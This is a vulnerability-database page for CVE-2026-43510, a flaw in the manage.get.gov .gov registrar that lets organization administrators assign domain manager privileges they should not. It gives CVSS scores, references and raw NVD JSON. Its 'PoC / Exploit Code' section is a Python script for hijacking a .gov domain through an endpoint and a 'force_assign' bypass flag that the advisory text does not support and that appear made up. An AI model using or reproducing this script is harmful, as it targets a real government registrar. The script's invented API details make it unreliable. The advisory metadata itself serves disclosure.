CVE-2026-43510

Description

manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

manage.get.gov < 1.176.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-43510 PoC
# Target: manage.get.gov
# Description: Assign domain manager privileges to a domain not in another organization.

TARGET_URL = "https://manage.get.gov/api/domains/assign"
# Attacker's session cookie (requires Organization Administrator privileges)
SESSION_COOKIE = "session_id=attacker_admin_cookie_here"
# Target domain to hijack
TARGET_DOMAIN = "example.gov"

headers = {
    "Cookie": SESSION_COOKIE,
    "Content-Type": "application/json"
}

payload = {
    "domain": TARGET_DOMAIN,
    "role": "manager",
    "force_assign": True  # Bypass logic to check if domain is managed
}

response = requests.post(TARGET_URL, json=payload, headers=headers)

if response.status_code == 200:
    print(f"[+] Successfully assigned manager privileges for {TARGET_DOMAIN}")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")
    print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43510
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43510
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43510/
[4] VulDB https://vuldb.com/cve/CVE-2026-43510
[5] https://github.com/cisagov/manage.get.gov/issues/4858
[6] https://github.com/cisagov/manage.get.gov/pull/4900
[7] https://github.com/cisagov/manage.get.gov/releases/tag/v1.176.0
[8] https://github.com/cisagov/manage.get.gov/security/advisories/GHSA-6wrg-x3j6-x464
[9] https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-121-01.json
[10] https://www.cve.org/CVERecord?id=CVE-2026-43510

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43510", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-05-07T20:16:44.753", "lastModified": "2026-05-07T20:32:03.640", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://github.com/cisagov/manage.get.gov/issues/4858", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/pull/4900", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/releases/tag/v1.176.0", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/security/advisories/GHSA-6wrg-x3j6-x464", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-121-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-43510", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}]}}